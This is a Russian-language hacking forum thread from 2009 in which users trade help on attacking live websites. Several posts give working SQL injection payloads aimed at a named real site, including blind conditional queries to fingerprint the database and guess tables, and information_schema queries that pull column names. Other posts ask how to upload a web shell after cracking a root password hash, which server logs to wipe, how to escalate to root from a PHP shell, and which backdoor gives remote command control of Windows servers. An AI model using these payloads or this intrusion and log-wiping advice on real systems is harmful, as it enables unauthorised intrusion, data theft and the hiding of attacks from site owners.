Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Нашёл скул инъект.
    на .php?mod=1' выдает обычную
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 1' at line 1
    на .php?mod=1'union/**/select/**/1/* пустую страницу
    на .php?mod=1'union/**/select/**/1,2, и т.д./* неверное количество полей
    Это и есть слепая инъекция?Никогда раньше не работал с blind инъектами
    Если да,то скажите пару слов про использование Bsqlbf или sqlmap
     
    #9581 p.r0phe.t, 28 Oct 2009
    Last edited: 28 Oct 2009
  2. Op3r

    Op3r New Member

    Joined:
    10 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    .php?mod=1'union/**/select/**/1/* пустую страницу

    а ты не пропустил ничего?
    .php?mod=1'/**/union/**/select/**/1/* пустую страницу
     
  3. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Разницы никакой,пробовал...
     
  4. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Реальный пример можно? :) Хотя тут и по ошибке всё понятно...
     
  5. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    http://apsite.ru/x/popup.php?mod=1'
    P.S. а чё тут понятно? =)
     
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    p.r0phe.t
    Я не понимаю, неужели нельзя сначала хоть что-то прочитать?
    Что ты хочешь что-бы тебе тут ответили без линка и с такой информацией?

    А вот так что выдаёт?
    .php?mod=-1'/**/union/**/select/**/1/*
    А вот так?
    .php?mod=-1/**/union/**/select/**/1/*
    А вот так?
    .php?mod=1/**/union/**/select/**/1/*
    А вот так?
    .php?mod=1/**/union/**/select/**/1--+
    А вот так?
    .php?mod=-1/**/union/**/select/**/1--+
    А вот так?
    .php?mod=-1/**/and/**/1=1--+
    А вот так?
    .php?mod=-1/**/and/**/1=2--+

    Продолжаем гадание, или почитаешь что-то? А может мы увидем линк?
     
  7. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    ^
    ^
    ^
    ^
     
  8. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    А разве я не могу взять другую html`ку на саете, переправить под форму создания юзера и вызову функцию?
     
  9. Op3r

    Op3r New Member

    Joined:
    10 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    как себя обезопасить после проведения Sql inj.
    известно:
    система: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.8e DAV/2 PHP/5.2.9 with Suhosin-Patch
    version(): 5.1.22-rc-log
    есть login и хеш пароль roota к БД бручу... пока безуспешно.
    там висит JOOMLA пасс тоже пока в бруте.
    как залить шелл после того как я узнаю пасс?
    логи чистить эти?
    /var/log/httpd-error.log
    /var/log/httpd-access.log
    какие дальше действия?
     
  10. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Скуль от какого юзера бд? МОжет через неё легче прочитать пасс root'а где-нить в конфигах чем брутить.
     
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    p.r0phe.t

    4 ветка, фильтрация пробелов, "+", "=".
    file_priv=n

    Если очень-очень нужно, то можно:
    http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*

    подбираем таблицу:
    http://apsite.ru/x/popup.php?mod=1'/**/or/**/if((select/**/1/**/from/**/admin),1,(select/**/1/**/union/**/select/**/2))/*

    и дальше в этом-же ключе :
    http://forum.antichat.ru/threadnav35207-1-10.html

    Отличный способ от скуки :)
     
  12. Op3r

    Op3r New Member

    Joined:
    10 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    root@localhost
    пример запроса кинь
     
  13. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    есть шелл на сервере ISS 6.0, на нем висит N пользователей и N сайтов этих пользователей,и у шелла права пользователя,можно ли как то вылезти из юзера?
    смд разумеется не работает.
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339

    https://forum.antichat.ru/showthread.php?t=145301
     
  15. crazy~driver

    crazy~driver Member

    Joined:
    21 Dec 2008
    Messages:
    97
    Likes Received:
    14
    Reputations:
    4
    подскажите...
    с помощью скули вида
    www.site.com/home.php?fid=8+and+1=2+union+select+1=user(),2,3+--+
    выдернул все названия бд,таблиц и столбцов. Теперь хочу узнать столбцы из таблицы users. Узнал тока столбец id.
    1) возможно ли узнать как то остальные названия кроме брута (брутить почему-то не получается)
    2) кавычки совать нельзя. можно ли в where хешить само условие?
     
  16. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    union select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1
    где 7573657273 users..а вообще читай статьи..это так трудно?
     
    1 person likes this.
  17. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    или через group_concat() без лимита, правда иногда может невсе вывести если сильно много данных.
     
  18. mindw0rk

    mindw0rk Elder - Старейшина

    Joined:
    8 Jun 2007
    Messages:
    63
    Likes Received:
    50
    Reputations:
    1
    Есть похапе-шелл и возможность компилить локальным юзером на FreeBSD 6.3-RELEASE-p11. На машине еще около двухста юзеров, MySql (5.0.75) и Апач.
    Как поднять права до рута? Как можно посмотреть содержимое директорий соседа?
     
    1 person likes this.
  19. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    а не проще так?
    http://apsite.ru/x/popup.php?mod=1'/**/union/**/select/**/1/**/from/**/admin/* результат тот же..
    Но,если таблица будет правильная,всё равно будет пустой экран.
    Поправь если что.

    http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*
    А какой смысл этого запроса,если все равно экран пустой?
     
    #9599 p.r0phe.t, 29 Oct 2009
    Last edited: 29 Oct 2009
  20. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Знаю что не по теме но все таки... Посоветуйте какой нибуть бек дор (системный продукт) для удаленного упр. сервера (предположительно стоит windows 2003/2008)
    Главный функционал -> командная строка (телнет чтоли называется) либо отстук куда нибуть (т.е. чтобы зараж. машина брала cmd команды с хоста моего)

    Знаю что много щас сущ. продуктов/бек доров но нужен стабильный продукт/бек дор (можно и палевный бек дор)
     
    #9600 wolmer, 29 Oct 2009
    Last edited: 29 Oct 2009
Thread Status:
Not open for further replies.